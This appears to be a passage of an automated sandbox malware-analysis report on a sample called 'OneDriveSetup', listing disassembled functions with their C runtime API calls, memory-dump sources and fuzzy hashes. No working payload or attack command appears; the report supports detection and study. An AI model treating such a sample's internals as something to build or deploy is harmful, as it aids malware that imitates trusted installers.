                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3809854901-0
                                                                                                                                                                        • Opcode ID: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
                                                                                                                                                                        • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                                                        • Opcode Fuzzy Hash: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
                                                                                                                                                                        • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                                                        Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 004057DE
                                                                                                                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                        • _malloc.LIBCMT ref: 00405842
                                                                                                                                                                        • _malloc.LIBCMT ref: 00405906
                                                                                                                                                                        • _malloc.LIBCMT ref: 00405930
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _malloc$AllocateHeap
                                                                                                                                                                        • String ID: 1.2.3
                                                                                                                                                                        • API String ID: 680241177-2310465506
                                                                                                                                                                        • Opcode ID: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                                                                                                        • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                                                        • Opcode Fuzzy Hash: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                                                                                                        • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                                                        Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3886058894-0
                                                                                                                                                                        • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                        • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                                                        • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                        • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                                                        Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __getptd.LIBCMT ref: 00414744
                                                                                                                                                                          • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                          • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                        • __getptd.LIBCMT ref: 0041475B
                                                                                                                                                                        • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                                                        • __lock.LIBCMT ref: 00414779
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                        • String ID: @.B
                                                                                                                                                                        • API String ID: 3521780317-470711618
                                                                                                                                                                        • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                        • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                                                                        • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                        • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                                                        Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                                                        • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                                                        • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                                                        • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                                                        • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2805327698-0
                                                                                                                                                                        • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                        • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                                                        • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                        • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                                                        Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                                                          • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                          • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                        • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                                                        • __lock.LIBCMT ref: 00414008
                                                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                                                        • InterlockedIncrement.KERNEL32(085316F0), ref: 00414050
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4271482742-0
                                                                                                                                                                        • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                        • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                                                        • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                        • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                                                        Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                        • API String ID: 1646373207-3105848591
                                                                                                                                                                        • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                        • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                                                        • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                        • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                                                        Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                                                        • __locking.LIBCMT ref: 0040C791
                                                                                                                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2395185920-0
                                                                                                                                                                        • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                        • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                                                        • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                        • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                                                        Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _fseek_malloc_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 208892515-0
                                                                                                                                                                        • Opcode ID: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
                                                                                                                                                                        • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                                                        • Opcode Fuzzy Hash: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
                                                                                                                                                                        • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                                                        Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                                                        • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                                                        • __locking.LIBCMT ref: 0040BB95
                                                                                                                                                                        • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3240763771-0
                                                                                                                                                                        • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                        • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                                                        • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                        • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                                                        Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                                                        • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                        • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                                                        • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                        • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                                                        Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                                                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                        • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                                                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                        • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89